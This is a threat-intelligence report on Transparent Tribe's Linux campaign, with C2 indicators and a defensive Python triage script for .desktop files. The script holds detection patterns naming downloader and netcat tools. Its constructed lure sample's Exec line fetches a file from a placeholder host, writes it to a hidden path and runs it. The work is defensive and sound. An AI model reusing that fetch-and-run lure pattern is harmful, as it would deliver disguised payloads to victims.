OSINT Investigation: Hunting Malicious Infrastructure Linked to Transparent Tribe
Sept. 30, 2024, 10:53 a.m.
Description
This investigation tracked infrastructure linked to the APT group Transparent Tribe and identified 15 malicious hosts on DigitalOcean acting as command-and-control servers for the Mythic C2 framework. The group uses Linux desktop entry (.desktop) files as an execution vector, targeting individuals in India. The campaign deploys Mythic Poseidon binaries as C2 agents and relies on techniques that evade security controls and maintain persistence. The investigation used JARM fingerprinting and HTML metadata analysis to expose the operational infrastructure, highlighting Transparent Tribe's growing sophistication in targeting Linux environments, particularly in Indian government sectors.
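The desktop-entry execution vector described above can be triaged offline with a small parser. What follows is an added example written for this page, not code from the original investigation, from Transparent Tribe tooling, or from the Mythic project. It parses a .desktop file (freedesktop.org Desktop Entry format), flags the patterns the description and attack-pattern list point at (a shell spawned from Exec, downloader use, dot-prefixed drop paths, a NoDisplay-hidden entry, a document-looking Name or Icon that runs code), and checks any URL found in Exec against the IP and URL indicators listed on this page. The two .desktop texts inside the block are constructed sample input, not the campaign's real file; 203.0.113.10 is a documentation address.

```python
"""Heuristic triage of Linux .desktop files against the patterns on this page.

Added example for this page. The sample files below are constructed; the
indicator sets are copied from the page's Indicators list.
"""
import configparser
import re
from urllib.parse import urlparse

# C2 infrastructure from the page's indicator list (DigitalOcean hosts).
C2_IPS = {
    "64.23.213.61", "206.189.134.185", "178.128.92.166", "161.35.186.219",
    "159.223.0.196", "159.203.133.189", "157.245.139.146", "152.42.245.111",
    "152.42.198.168", "143.198.64.151", "142.93.74.10", "138.197.156.131",
    "137.184.211.26", "64.23.155.109", "165.232.118.207", "139.59.109.136",
}
C2_URLS = {"http://157.245.139.146/trs-clip"}

# Exec= patterns worth flagging. These are heuristics, not proof of malice.
SHELL_C = re.compile(r"\b(sh|bash|dash|zsh)\b\s+-c\b")            # T1059.004
DOWNLOADERS = re.compile(r"\b(curl|wget|python3?|perl|base64|nc|ncat)\b")
HIDDEN_PATH = re.compile(r"/\.[A-Za-z0-9_]")                       # T1564.001, e.g. /tmp/.r
URL_RE = re.compile(r"https?://[^\s\"']+")
DOC_EXT = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt")
DOC_ICON_HINTS = ("pdf", "libreoffice", "x-office", "document")


def parse_desktop(text: str):
    """Return the [Desktop Entry] group as a case-sensitive mapping, or None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keys such as Exec/Name are case-sensitive in the spec
    cp.read_string(text)
    return cp["Desktop Entry"] if cp.has_section("Desktop Entry") else None


def triage(text: str) -> list[str]:
    """Return a list of finding codes for one .desktop file (empty means clean)."""
    entry = parse_desktop(text)
    if entry is None:
        return ["no-desktop-entry-group"]
    findings = []
    exec_line = entry.get("Exec", "")
    name = entry.get("Name", "").lower()
    icon = entry.get("Icon", "").lower()

    runs_code = bool(SHELL_C.search(exec_line) or DOWNLOADERS.search(exec_line))
    if SHELL_C.search(exec_line):
        findings.append("exec-spawns-shell")
    if DOWNLOADERS.search(exec_line):
        findings.append("exec-uses-downloader")
    if HIDDEN_PATH.search(exec_line):
        findings.append("exec-writes-dotfile")
    if entry.get("NoDisplay", "false").lower() == "true":
        findings.append("nodisplay-hidden-entry")  # hides the launcher from menus
    # A launcher that looks like a document (T1204.002 lure) but runs a shell/downloader.
    looks_like_doc = name.endswith(DOC_EXT) or any(h in icon for h in DOC_ICON_HINTS)
    if looks_like_doc and runs_code:
        findings.append("document-lure-runs-code")
    # Pivot every URL in Exec to the page's indicators (T1071.001 staging host).
    for url in URL_RE.findall(exec_line):
        host = urlparse(url).hostname or ""
        if url in C2_URLS or host in C2_IPS:
            findings.append(f"known-c2:{host}")
        else:
            findings.append(f"unlisted-url:{host}")
    return findings


# Constructed sample: a document-themed launcher that stages and runs a dotfile.
SAMPLE_DESKTOP = """[Desktop Entry]
Version=1.0
Type=Application
Name=Ministry_Circular.pdf
Comment=Ministry of Defence Circular
Icon=application-pdf
Terminal=false
NoDisplay=true
Exec=bash -c "curl -fsSL http://203.0.113.10/report -o /tmp/.r && chmod +x /tmp/.r && /tmp/.r"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
"""

if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_DESKTOP), ("benign", BENIGN_DESKTOP)):
        print(label, triage(text))
```

Run it over every file under ~/.config/autostart, ~/.local/share/applications and ~/Desktop; an entry that scores `document-lure-runs-code` together with `known-c2:<ip>` is the strongest signal here, while a lone `exec-writes-dotfile` or `nodisplay-hidden-entry` is common in legitimate software and only worth a look in combination.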
Tags
Date
- Created: Sept. 30, 2024, 10:42 a.m.
- Published: Sept. 30, 2024, 10:42 a.m.
- Modified: Sept. 30, 2024, 10:53 a.m.
Indicators
- ff7be8a45737507157e0a9e7d291c5f3380e305c223f01a69598a8a9c4fa6f35
- 0cb37745b1a16b28fe60ecb70367fdc625d9f90e068e25f235234efed9b069b9
- 64.23.213.61
- 206.189.134.185
- 178.128.92.166
- 161.35.186.219
- 159.223.0.196
- 159.203.133.189
- 157.245.139.146
- 152.42.245.111
- 152.42.198.168
- 143.198.64.151
- 142.93.74.10
- 138.197.156.131
- 137.184.211.26
- 64.23.155.109
- 165.232.118.207
- 139.59.109.136
- http://157.245.139.146/trs-clip
Attack Patterns
- Mythic
- Poseidon
- Transparent Tribe
- T1048
- T1564.001
- T1059.004
- T1113
- T1071.001
- T1070.004
- T1204.002
- T1547
- T1082
- T1566.001
- T1083
- T1027
- T1566
- T1059
Additional Information
- Defense
- Government
- British Indian Ocean Territory
- India